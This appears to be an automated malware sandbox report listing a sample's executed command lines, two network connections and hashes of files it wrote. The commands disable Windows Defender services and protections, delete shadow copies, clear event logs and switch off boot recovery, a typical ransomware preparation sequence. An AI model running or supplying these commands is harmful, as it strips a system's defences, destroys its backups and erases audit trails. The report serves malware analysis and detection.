reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 13.107.4.50:80 | | tcp |
| US | 13.107.4.50:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |